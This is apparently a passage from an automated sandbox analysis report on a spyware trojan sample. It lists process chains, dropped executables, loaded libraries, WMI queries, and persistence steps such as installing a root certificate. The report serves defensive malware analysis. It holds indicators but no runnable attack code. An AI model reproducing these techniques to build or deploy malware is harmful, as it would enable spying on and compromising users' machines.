                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701CB8011_2_0701CB80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701ABF011_2_0701ABF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701D8C811_2_0701D8C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701372011_2_07013720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701373011_2_07013730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_070106B811_2_070106B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_070116C811_2_070116C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701650811_2_07016508
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701651811_2_07016518
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_070144D811_2_070144D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701539011_2_07015390
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_070153A011_2_070153A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701125111_2_07011251
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701126011_2_07011260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701704211_2_07017042
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0701705011_2_07017050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_070120A011_2_070120A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07013D6011_2_07013D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07013D7011_2_07013D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07017B9811_2_07017B98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07017BA811_2_07017BA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07012BC011_2_07012BC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07012BD011_2_07012BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_07015A9811_2_07015A98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_070189E011_2_070189E0
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_018188E013_2_018188E0
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_018191B013_2_018191B0
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_0181C58013_2_0181C580
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_0181859813_2_01818598
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_0181C57013_2_0181C570
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_05D2341813_2_05D23418
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_05D2340913_2_05D23409
                      Source: C:\ProgramData\Path\Path.exeCode function: 17_2_016D88E017_2_016D88E0
                      Source: C:\ProgramData\Path\Path.exeCode function: 17_2_016D91B017_2_016D91B0
                      Source: C:\ProgramData\Path\Path.exeCode function: 17_2_016D859817_2_016D8598
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\filename.exe B867D368D4597334A036B46816473BE270D6779DB2428AAE75053AF8CACF1E85
                      Source: 66dcad8f5f33a_crypted.exe, 00000000.00000002.1477865176.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBless.exe8 vs 66dcad8f5f33a_crypted.exe
                      Source: 66dcad8f5f33a_crypted.exe, 00000000.00000002.1477328716.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 66dcad8f5f33a_crypted.exe
                      Source: 66dcad8f5f33a_crypted.exeBinary or memory string: OriginalFilenameVQP.exeP vs 66dcad8f5f33a_crypted.exe
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, nGqHH-.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 13.2.filename.exe.4404a80.0.raw.unpack, nGqHH-.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: filename.exe.11.dr, nGqHH-.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: filename.exe.11.dr, nGqHH-.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Path.exe.13.dr, nGqHH-.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Path.exe.13.dr, nGqHH-.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/11@3/4
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\66dcad8f5f33a_crypted.exe.logJump to behavior
                      Source: C:\ProgramData\Path\Path.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMutant created: \Sessions\1\BaseNamedObjects\FsKJttSV2haQ5ZWZ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user~1\AppData\Local\Temp\TmpECBC.tmpJump to behavior
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 66dcad8f5f33a_crypted.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                      Source: C:\ProgramData\Path\Path.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe "C:\Users\user\Desktop\66dcad8f5f33a_crypted.exe"
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user~1\AppData\Local\Temp\filename.exe"
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\ProgramData\Path\Path.exe "C:\ProgramData\Path\Path.exe"
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5445.tmp.cmd""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\filename.exe "C:\Users\user~1\AppData\Local\Temp\filename.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\ProgramData\Path\Path.exe "C:\ProgramData\Path\Path.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5445.tmp.cmd""Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6Jump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: version.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\ProgramData\Path\Path.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
                      Source: Google Chrome.lnk.11.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: filename.exe.11.drStatic PE information: 0xAB1DF16F [Tue Dec 21 14:51:27 2060 UTC]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_068FECF2 push eax; ret 11_2_068FED01
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_05D255D8 pushad ; ret 13_2_05D255D9
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeCode function: 13_2_05D26B28 pushfd ; iretd 13_2_05D26B29
                      Source: 66dcad8f5f33a_crypted.exeStatic PE information: section name: .text entropy: 7.995826801041677

                      Persistence and Installation Behavior

                      barindex
                      Installs new ROOT certificates
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\filename.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeFile created: C:\ProgramData\Path\Path.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeFile created: C:\ProgramData\Path\Path.exeJump to dropped file
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
